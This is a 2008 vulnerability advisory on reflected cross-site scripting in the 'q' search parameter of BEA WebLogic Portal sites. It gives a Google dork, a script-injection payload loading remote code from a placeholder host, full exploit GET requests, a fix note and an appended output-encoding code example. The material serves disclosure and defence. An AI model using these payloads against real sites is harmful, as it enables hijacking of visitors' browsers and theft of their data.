
bea-xss.txt

Posted on 03 June 2008

+============================================================================================+
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities                          +
+============================================================================================+

Author(s): Ivan Sanchez

Product:
--------
BEA Systems Inc
http://www.bea.com
Oracle Corporation BEA WebLogic Portal (and others)

Nullcode has reported a vulnerability in BEA WebLogic Portal Domains, which can be exploited by malicious people to conduct high cross-site scripting attacks.

Input passed to the "q" parameter in the function "search_g4.js" isn't properly sanitised. This can be exploited to execute arbitrary remote script in a user's browser.

The vulnerability has been reported in all *Bea.com domains; all sites use the same function to search.
So other versions and other products (BEA-Company) may also be affected.

Google Dork:
-----------
site:bea.com/

You can see hundreds of sites.

Function vulnerable:
--------------------
GET http://www.bea.com/content/search/search_g4.js HTTP/1.1

search_g4.js ("textbox search", insert for example):

"><script src=http://site/evil-remote-code.js></script>

seconds....

Then redirect to other BEA application:
---------------------------------------
Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>

GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1

=> HTTP/1.1 200 OK[1.922 s]

seconds.....

simply exploited....

Extract Internal code:

1-
<form action="http://seeker.bea.com/search" method="get" class="formspace">
<div class="searchSpacer3">
  <label for="search"></label>
  <input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';">
  <input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0"
         onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"
         onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'"
         style="vertical-align:bottom;">

2- you can see URL://"the QueryStrings"

Solution:
---------
Edit the source code to ensure that input is properly sanitised.

NULL CODE SERVICES [ www.nullcode.com.ar ]
Hunting Security Bugs!
+============================================================================================+
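
One way to apply the Solution above, shown as an added example that is not part of the original advisory and is not BEA's code: encode the "q" value for the context it is written into. It assumes the term is reflected into the value attribute of the search box, as the "> prefix in the advisory's input suggests; the function names and the search.example host are hypothetical.

```javascript
// Added example (not BEA's code): context-aware output encoding for a
// reflected search term. All function names here are hypothetical.

// Characters that can close an attribute value or open a tag.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the raw term is concatenated into value="...".
function renderSearchBoxUnsafe(q) {
  return '<input type="text" name="q" id="search" class="search" value="' + q + '">';
}

// Hardened pattern: same markup, term encoded for the HTML attribute context.
function renderSearchBoxSafe(q) {
  return '<input type="text" name="q" id="search" class="search" value="' + escapeHtml(q) + '">';
}

// URL context (the redirect to the search application): percent-encode the
// term so it stays a single query value.
function buildSearchUrl(base, q) {
  return base + '?q=' + encodeURIComponent(q) + '&site=all';
}

// Sample input: the string the advisory enters into the search textbox.
const sample = '"><script src=http://site/evil-remote-code.js></script>';

function demo() {
  return {
    unsafe: renderSearchBoxUnsafe(sample),
    safe: renderSearchBoxSafe(sample),
    url: buildSearchUrl('http://search.example/search', sample),
  };
}

console.log(demo());
```

HTML encoding and URL encoding are not interchangeable: each output context needs its own encoder, applied at the point where the value is written.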

 
